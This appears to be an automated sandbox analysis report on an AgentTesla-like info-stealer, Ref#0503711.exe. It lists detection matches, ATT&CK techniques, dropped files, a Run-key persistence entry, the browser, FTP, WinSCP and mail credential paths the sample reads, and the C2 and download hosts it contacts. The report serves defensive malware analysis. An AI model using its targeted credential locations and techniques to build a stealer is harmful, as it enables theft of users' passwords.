Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 2.2.Ref#0503711.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Ref#0503711.exe.4acd860.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Ref#0503711.exe.48eac18.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2919838157.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2912403992.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1691296366.0000000003850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2919838157.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1706049120.0000000004701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2919838157.0000000002F5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1706049120.00000000047F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Ref#0503711.exe PID: 7332, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Ref#0503711.exe PID: 7416, type: MEMORYSTR
Source: C:\Users\user\Desktop\Ref#0503711.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\Desktop\Ref#0503711.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Ref#0503711.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Ref#0503711.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\Ref#0503711.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\Desktop\Ref#0503711.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\Desktop\Ref#0503711.exe | File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Users\user\Desktop\Ref#0503711.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\Ref#0503711.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\Ref#0503711.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\Desktop\Ref#0503711.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match | File source: 2.2.Ref#0503711.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Ref#0503711.exe.4acd860.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Ref#0503711.exe.48eac18.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2912403992.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1691296366.0000000003850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2919838157.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1706049120.0000000004701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1706049120.00000000047F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Ref#0503711.exe PID: 7332, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Ref#0503711.exe PID: 7416, type: MEMORYSTR

                      Remote Access Functionality

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 2.2.Ref#0503711.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Ref#0503711.exe.4acd860.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Ref#0503711.exe.48eac18.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2919838157.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2912403992.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1691296366.0000000003850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2919838157.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1706049120.0000000004701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2919838157.0000000002F5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1706049120.00000000047F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Ref#0503711.exe PID: 7332, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Ref#0503711.exe PID: 7416, type: MEMORYSTR
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Registry Run Keys / Startup Folder | 111 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 Credentials in Registry | 24 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Registry Run Keys / Startup Folder | 31 Obfuscated Files or Information | Security Account Manager | 1 Query Registry | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 22 Software Packing | NTDS | 221 Security Software Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Process Discovery | SSH | Keylogging | 23 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 151 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 151 Virtualization/Sandbox Evasion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 111 Process Injection | Proc Filesystem | 1 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Behavior Graph | ID: 1528272 | Sample: Ref#0503711.exe | Startdate: 07/10/2024 | Architecture: WINDOWS | Score: 100
Domains contacted: tempfiles.ninja, api.ipify.org
Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 10 other signatures
Ref#0503711.exe (started)
  Dropped: C:\Users\user\AppData\Roaming\ioibrzb.exe, PE32; C:\Users\user\AppData\Local\Temp\docdd.exe, PE32; C:\Users\user\...\ioibrzb.exe:Zone.Identifier, ASCII
  Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Injects a PE file into a foreign processes
  Started: Ref#0503711.exe, docdd.exe
Ref#0503711.exe (started by Ref#0503711.exe)
  Network: 162.254.34.31, 49733, 587, VIVIDHOSTINGUS, United States; api.ipify.org 172.67.74.152, 443, 49732, CLOUDFLARENETUS, United States
  Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)
docdd.exe (started by Ref#0503711.exe)
  Network: tempfiles.ninja 104.21.56.249, 443, 49731, CLOUDFLARENETUS, United States
  Dropped: C:\Users\user\AppData\...\tmp2083.tmp.exe, PE32
  Signatures: Machine Learning detection for dropped file
  Started: tmp2083.tmp.exe
tmp2083.tmp.exe (started by docdd.exe)
  Signatures: Machine Learning detection for dropped file; Injects a PE file into a foreign processes
  Started: tmp2083.tmp.exe
tmp2083.tmp.exe (started by tmp2083.tmp.exe)
  Started: WerFault.exe

Source | Detection | Scanner | Label | Link
Ref#0503711.exe | 32% | ReversingLabs | ByteCode-MSIL.Trojan.GenSteal
Ref#0503711.exe | 100% | Joe Sandbox ML

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\docdd.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Roaming\ioibrzb.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe | 100% | Joe Sandbox ML

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label | Link
https://api.ipify.org/ | 0% | URL Reputation | safe
https://api.ipify.org | 0% | URL Reputation | safe
https://stackoverflow.com/q/14436606/23354 | 0% | URL Reputation | safe
https://account.dyn.com/ | 0% | URL Reputation | safe
https://stackoverflow.com/q/11564914/23354; | 0% | URL Reputation | safe
https://stackoverflow.com/q/2152978/23354 | 0% | URL Reputation | safe
https://api.ipify.org/t | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe

Name | IP | Active | Malicious | Antivirus Detection | Reputation
tempfiles.ninja | 104.21.56.249 | true | false | | unknown
api.ipify.org | 172.67.74.152 | true | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | URL Reputation: safe | unknown
https://tempfiles.ninja/d/4wmb3QgRfXU5M4s2/bHzsEUNaVOT3WXU2lPvPRcIphVFu9mJr | false | | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
https://api.ipify.org | Ref#0503711.exe, 00000000.00000002.1706049120.0000000004701000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1691296366.0000000003850000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.00000000047F9000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000002.00000002.2912403992.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Ref#0503711.exe, 00000002.00000002.2919838157.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/mgravell/protobuf-neti | Ref#0503711.exe, 00000000.00000002.1706049120.0000000004418000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1720774712.0000000006050000.00000004.08000000.00040000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.00000000045EA000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://stackoverflow.com/q/14436606/23354 | Ref#0503711.exe, 00000000.00000002.1691296366.0000000003411000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.0000000004418000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1720774712.0000000006050000.00000004.08000000.00040000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.00000000045EA000.00000004.00000800.00020000.00000000.sdmp, tmp2083.tmp.exe, 00000003.00000002.1751533958.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://account.dyn.com/ | Ref#0503711.exe, 00000000.00000002.1706049120.0000000004701000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1691296366.0000000003850000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.00000000047F9000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000002.00000002.2912403992.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/mgravell/protobuf-netJ | Ref#0503711.exe, 00000000.00000002.1706049120.0000000004418000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1720774712.0000000006050000.00000004.08000000.00040000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.00000000045EA000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://tempfiles.ninja | docdd.exe, 00000001.00000002.1728738734.0000000002701000.00000004.00000800.00020000.00000000.sdmp, docdd.exe, 00000001.00000002.1728738734.0000000002773000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://stackoverflow.com/q/11564914/23354; | Ref#0503711.exe, 00000000.00000002.1706049120.0000000004418000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1720774712.0000000006050000.00000004.08000000.00040000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.00000000045EA000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://stackoverflow.com/q/2152978/23354 | Ref#0503711.exe, 00000000.00000002.1706049120.0000000004418000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1720774712.0000000006050000.00000004.08000000.00040000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.00000000045EA000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/mgravell/protobuf-net | Ref#0503711.exe, 00000000.00000002.1706049120.0000000004418000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1720774712.0000000006050000.00000004.08000000.00040000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.00000000045EA000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://tempfiles.ninjad | docdd.exe, 00000001.00000002.1728738734.000000000278C000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://api.ipify.org/t | Ref#0503711.exe, 00000002.00000002.2919838157.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempfiles.ninja | docdd.exe, 00000001.00000002.1728738734.000000000278C000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Ref#0503711.exe, 00000000.00000002.1691296366.000000000379F000.00000004.00000800.00020000.00000000.sdmp, docdd.exe, 00000001.00000002.1728738734.0000000002701000.00000004.00000800.00020000.00000000.sdmp, docdd.exe, 00000001.00000002.1728738734.0000000002773000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000002.00000002.2919838157.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, tmp2083.tmp.exe, 00000003.00000002.1751533958.000000000313B000.00000004.00000800.00020000.00000000.sdmp, tmp2083.tmp.exe, 00000003.00000002.1751533958.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
162.254.34.31 | unknown | United States | | 64200 | VIVIDHOSTINGUS | true
104.21.56.249 | tempfiles.ninja | United States | | 13335 | CLOUDFLARENETUS | false
172.67.74.152 | api.ipify.org | United States | | 13335 | CLOUDFLARENETUS | false

                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1528272
                                        Start date and time:2024-10-07 18:04:58 +02:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 7m 55s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:12
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:Ref#0503711.exe
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@10/5@2/3
                                        EGA Information:
                                        • Successful, ratio: 60%
                                        HCA Information:
                                        • Successful, ratio: 95%
                                        • Number of executed functions: 478
                                        • Number of non-executed functions: 42
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Execution Graph export aborted for target docdd.exe, PID 7392 because it is empty
                                        • Execution Graph export aborted for target tmp2083.tmp.exe, PID 7692 because it is empty
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        • VT rate limit hit for: Ref#0503711.exe

Time | Type | Description
12:05:51 | API Interceptor | 26x Sleep call for process: docdd.exe modified
12:05:52 | API Interceptor | 25x Sleep call for process: Ref#0503711.exe modified
17:05:54 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ioibrzb C:\Users\user\AppData\Roaming\ioibrzb.exe
17:06:14 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ioibrzb C:\Users\user\AppData\Roaming\ioibrzb.exe

Match | Associated Sample Name / URL | Detection | Threat Name | Context
162.254.34.31 | Booking_0106.exe | malicious | AgentTesla
 | Ref_5010_103.exe | malicious | AgentTesla
 | Ship_Doc_18505.exe | malicious | AgentTesla
 | Booking-103.exe | malicious | AgentTesla
 | Ref Cheque 705059.vbe | malicious | AgentTesla
 | INVOICE AA MARINE CONTRACTING 92900202002-PDF.exe | malicious | AgentTesla
 | Request For Quote document.exe | malicious | AgentTesla
 | REF DOCUMENTS.js | malicious | AgentTesla
 | Booking_261.exe | malicious | AgentTesla, Clipboard Hijacker
 | Payment Confirmation Documents.vbe | malicious | AgentTesla
104.21.56.249 | 1U34vTVJ97.pdf | malicious | Unknown
172.67.74.152 | file.exe | malicious | Unknown
• api.ipify.org/
 | file.exe | malicious | Unknown
• api.ipify.org/
 | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar
• api.ipify.org/
 | file.exe | malicious | RDPWrap Tool
• api.ipify.org/
 | Prismifyr-Install.exe | malicious | Node Stealer
• api.ipify.org/
 | 2zYP8qOYmJ.exe | malicious | Unknown
• api.ipify.org/
 | file.exe | malicious | Unknown
• api.ipify.org/
 | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar
• api.ipify.org/
 | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar
• api.ipify.org/
 | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar
• api.ipify.org/

Match | Associated Sample Name / URL | Detection | Threat Name | Context
tempfiles.ninja | 1U34vTVJ97.pdf | malicious | Unknown
• 104.21.56.249
api.ipify.org | 8ID0109FLT24PO92CD-R.pdf | malicious | HTMLPhisher
• 104.26.12.205
 | shipping.exe | malicious | AgentTesla
• 172.67.74.152
 | QUOTATIONS#08673.exe | malicious | AgentTesla
• 172.67.74.152
 | MAVI VATAN - VSL's DETAILS.docx.exe | malicious | AgentTesla, PureLog Stealer
• 104.26.12.205
 | http://pub-6abf9f4f2e414af1a92f1d0cac9c1674.r2.dev/auth_gen.html | malicious | Unknown
• 172.67.74.152
 | New order.exe | malicious | AgentTesla
• 104.26.12.205
 | http://netflix.dittmedlemskap.com/ | malicious | Unknown
• 172.67.74.152
 | DHL_Shipment_Details_8th_October.pdf.exe | malicious | AgentTesla
• 104.26.13.205
 | http://duttweilerangel6891-sidebarg165895-flarew256.pages.dev/help/contact/656749019228815 | malicious | HTMLPhisher
• 172.67.74.152
 | http://duttweilerangel6891-sidebarg165895-flarew256.pages.dev/help/contact/581207279857749 | malicious | HTMLPhisher
• 172.67.74.152

Match | Associated Sample Name / URL | Detection | Threat Name | Context
VIVIDHOSTINGUS | kkk.exe | malicious | FormBook
• 162.254.32.121
 | Booking_0106.exe | malicious | AgentTesla
• 162.254.34.31
 | ADNOC requesting RFQ.exe | malicious | FormBook
                                                              • 162.254.34.125
                                                              Ref_5010_103.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 162.254.34.31
                                                              Ship_Doc_18505.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 162.254.34.31
                                                              Booking-103.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 162.254.34.31
                                                              Ref Cheque 705059.vbeGet hashmaliciousAgentTeslaBrowse
                                                              • 162.254.34.31
                                                              INVOICE AA MARINE CONTRACTING 92900202002-PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 162.254.34.31
                                                              Request For Quote document.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 162.254.34.31
                                                              REF DOCUMENTS.jsGet hashmaliciousAgentTeslaBrowse
                                                              • 162.254.34.31
                                                              CLOUDFLARENETUSNdSXVNeoET.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                              • 188.114.97.3
                                                              VLSiVR4Qxs.exeGet hashmaliciousLummaC, VidarBrowse
                                                              • 188.114.97.3
                                                              file.exeGet hashmaliciousLummaCBrowse
                                                              • 172.67.206.204
                                                              vEcIHT68pU.exeGet hashmaliciousLummaCBrowse
                                                              • 188.114.96.3
                                                              https://t.dripemail3.com/c/eyJhbGciOiJIUzI1NiJ9.eyJhdWQiOiJkZXRvdXIiLCJpc3MiOiJtb25vbGl0aCIsInN1YiI6ImRldG91cl9saW5rIiwiaWF0IjoxNzI4MzEwODA2LCJuYmYiOjE3MjgzMTA4MDYsImFjY291bnRfaWQiOiIyNzYyNjA5IiwiZGVsaXZlcnlfaWQiOiJwODJtNGNzMzB4cXl2Zmh0NzQxaSIsInRva2VuIjoicDgybTRjczMweHF5dmZodDc0MWkiLCJzZW5kX2F0IjoxNzI4MzA5NzMyLCJlbWFpbF9pZCI6OTk2NDE4NiwiZW1haWxhYmxlX3R5cGUiOiJCcm9hZGNhc3QiLCJlbWFpbGFibGVfaWQiOjM5NTQwMTYsInVybCI6Imh0dHBzOi8vZGFpbHlhbGFza2EuY29tL25ld3M_X19zPWw5bzljOTZzbG8xZjF3aGFiODZrJnV0bV9zb3VyY2U9ZHJpcCZ1dG1fbWVkaXVtPWVtYWlsJnV0bV9jYW1wYWlnbj0lRjAlOUYlOTElOEMrV2UrTWFkZStJdCtFYXN5K0ZvcitZb3UrJUYwJTlGJTkxJThDIn0.MNRoosOspCCWwx3VuYY41W-crcEzfjjfIELlO_QMAdMGet hashmaliciousHtmlDropperBrowse
                                                              • 172.67.212.190
                                                              https://forms.office.com/Pages/ShareFormPage.aspx?id=W8eUhlA4rUOuklSyoCn21mtmgAvPzYFJuSM99R6gX3dUQ1IyWUM1UUhTS1pWQ0xXNkI3RzlRRkFIVi4u&sharetoken=93tGEOrxpFy3X0nnxFcrGet hashmaliciousHTMLPhisherBrowse
                                                              • 104.17.25.14
                                                              file.exeGet hashmaliciousLummaCBrowse
                                                              • 188.114.96.3
                                                              Contract_Agreement_Monday October 2024.pdfGet hashmaliciousUnknownBrowse
                                                              • 104.21.90.101
                                                              CatalogApp.exeGet hashmaliciousLummaCBrowse
                                                              • 172.67.206.204
                                                              DocuSign-Docx.pdfGet hashmaliciousUnknownBrowse
                                                              • 172.67.139.158
                                                              CLOUDFLARENETUSNdSXVNeoET.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                              • 188.114.97.3
                                                              VLSiVR4Qxs.exeGet hashmaliciousLummaC, VidarBrowse
                                                              • 188.114.97.3
                                                              file.exeGet hashmaliciousLummaCBrowse
                                                              • 172.67.206.204
                                                              vEcIHT68pU.exeGet hashmaliciousLummaCBrowse
                                                              • 188.114.96.3
                                                              https://t.dripemail3.com/c/eyJhbGciOiJIUzI1NiJ9.eyJhdWQiOiJkZXRvdXIiLCJpc3MiOiJtb25vbGl0aCIsInN1YiI6ImRldG91cl9saW5rIiwiaWF0IjoxNzI4MzEwODA2LCJuYmYiOjE3MjgzMTA4MDYsImFjY291bnRfaWQiOiIyNzYyNjA5IiwiZGVsaXZlcnlfaWQiOiJwODJtNGNzMzB4cXl2Zmh0NzQxaSIsInRva2VuIjoicDgybTRjczMweHF5dmZodDc0MWkiLCJzZW5kX2F0IjoxNzI4MzA5NzMyLCJlbWFpbF9pZCI6OTk2NDE4NiwiZW1haWxhYmxlX3R5cGUiOiJCcm9hZGNhc3QiLCJlbWFpbGFibGVfaWQiOjM5NTQwMTYsInVybCI6Imh0dHBzOi8vZGFpbHlhbGFza2EuY29tL25ld3M_X19zPWw5bzljOTZzbG8xZjF3aGFiODZrJnV0bV9zb3VyY2U9ZHJpcCZ1dG1fbWVkaXVtPWVtYWlsJnV0bV9jYW1wYWlnbj0lRjAlOUYlOTElOEMrV2UrTWFkZStJdCtFYXN5K0ZvcitZb3UrJUYwJTlGJTkxJThDIn0.MNRoosOspCCWwx3VuYY41W-crcEzfjjfIELlO_QMAdMGet hashmaliciousHtmlDropperBrowse
                                                              • 172.67.212.190
                                                              https://forms.office.com/Pages/ShareFormPage.aspx?id=W8eUhlA4rUOuklSyoCn21mtmgAvPzYFJuSM99R6gX3dUQ1IyWUM1UUhTS1pWQ0xXNkI3RzlRRkFIVi4u&sharetoken=93tGEOrxpFy3X0nnxFcrGet hashmaliciousHTMLPhisherBrowse
                                                              • 104.17.25.14
                                                              file.exeGet hashmaliciousLummaCBrowse
                                                              • 188.114.96.3
                                                              Contract_Agreement_Monday October 2024.pdfGet hashmaliciousUnknownBrowse
                                                              • 104.21.90.101
                                                              CatalogApp.exeGet hashmaliciousLummaCBrowse
                                                              • 172.67.206.204
                                                              DocuSign-Docx.pdfGet hashmaliciousUnknownBrowse
                                                              • 172.67.139.158
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              3b5074b1b5d032e5620f69f9f700ff0escan_374783.jsGet hashmaliciousAgentTeslaBrowse
                                                              • 104.21.56.249
                                                              • 172.67.74.152
                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                              • 104.21.56.249
                                                              • 172.67.74.152
                                                              shipping.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 104.21.56.249
                                                              • 172.67.74.152
                                                              https://future.nhs.ukGet hashmaliciousUnknownBrowse
                                                              • 104.21.56.249
                                                              • 172.67.74.152
                                                              wrong bank details.exeGet hashmaliciousMassLogger RATBrowse
                                                              • 104.21.56.249
                                                              • 172.67.74.152
                                                              z1PO7311145.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 104.21.56.249
                                                              • 172.67.74.152
                                                              TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 104.21.56.249
                                                              • 172.67.74.152
                                                              Payment.vbsGet hashmaliciousFormBookBrowse
                                                              • 104.21.56.249
                                                              • 172.67.74.152
                                                              PAYMENT SPECIFIKACIJA 364846637-pdf.vbsGet hashmaliciousRemcosBrowse
                                                              • 104.21.56.249
                                                              • 172.67.74.152
                                                              https://bono-sicherheitstechniksharefile.btn-ebikes.com/Get hashmaliciousHtmlDropperBrowse
                                                              • 104.21.56.249
                                                              • 172.67.74.152
                                                              No context
                                                              Process:C:\Users\user\AppData\Local\Temp\docdd.exe
                                                              File Type:CSV text
                                                              Category:dropped
                                                              Size (bytes):1058
                                                              Entropy (8bit):5.356262093008712
                                                              Encrypted:false
                                                              SSDEEP:24:ML9E4KlKDE4KhKiKhwE4Ty1KIE4oKNzKoZAE4KzeR:MxHKlYHKh3owH8tHo6hAHKzeR
                                                              MD5:B2EFBF032531DD2913F648E75696B0FD
                                                              SHA1:3F1AC93E4C10AE6D48E6CE1745D23696FD6554F6
                                                              SHA-256:4E02B680F9DAB8F04F2443984B5305541F73B52A612129FCD8CC0C520C831E4B
